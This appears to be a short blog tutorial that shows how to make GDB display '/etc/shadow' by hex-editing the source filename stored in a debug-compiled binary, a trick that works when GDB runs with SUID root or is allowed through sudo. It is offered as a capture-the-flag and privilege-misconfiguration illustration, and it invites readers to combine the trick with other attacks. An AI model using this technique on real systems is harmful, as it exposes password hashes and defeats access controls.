The following is a simple trick where you can use GDB as a trampoline to read a file which originally you don’t have enough permission to read. This trick could also be helpful in a binary capture-the-flag (CTF) or reverse engineering challenge.

 

Here are the steps:

 

 

1. Compile ‘foo.c‘ with the GNU Compiler (GCC) using the -ggdb flag.

2. Open the resulting ELF executable with GDB and the list command to read its source code as shown in the following screen shot:

 

3. Make a copy of ‘foo.c’ and call it ‘_etc_shadow.c’, so that this name is hardcoded within the internal metadata structures of the compiled ELF executable as in the following screen shot.

 

4. Open the executable with your preferred hex editor (I used HT Editor because it supports the ELF file format) and replace ‘_etc_shadow.c’ with ‘/etc/shadow’ (don’t forget the NULL character at the end of the string) the first two times it appears.

 

5. Evidently, it won’t work unless you have sufficient user privileges, otherwise GDB won’t be able to read /etc/shadow.

 

6. If you trace the open() syscall calls executed by GBD:

 ($strace -e open gdb ./_etc_shadow) 
you can see that it returns -1 (EACCES) because of insufficient permissions.
 

7. Now imagine that for some reason GDB is a privileged command (the SUID (Set User ID) bit in the permissions is enabled). Opening our modified ELF file with GDB, it would be possible to read the contents of ‘/etc/shadow’ because the gdb command would be executed with root privileges.

 

8. Imagine another hypothetical scenario: a hardened development (or CTF) server that has been configured with granular privileges using a tool such as Sudo to allow certain commands to be executed. (To be honest I have never seen a scenario like this before, but it’s an example worth considering to illustrate how this attack might evolve).

 

9. You cannot display the contents of‘/etc/shadow’ by using the cat command because /bin/cat is an unauthorized command in our configuration. However, the gdb command has been authorized and therefore has the rights needed to display the source file (/etc/shadow):

 

Voilà! 
 

Taking advantage of this GDB feature and mixing it with other techniques could make a more sophisticated attack possible. Use your imagination.
 

Do you have other ideas how this could be used as an attack vector, either by itself or if combined with other techniques? Let me know.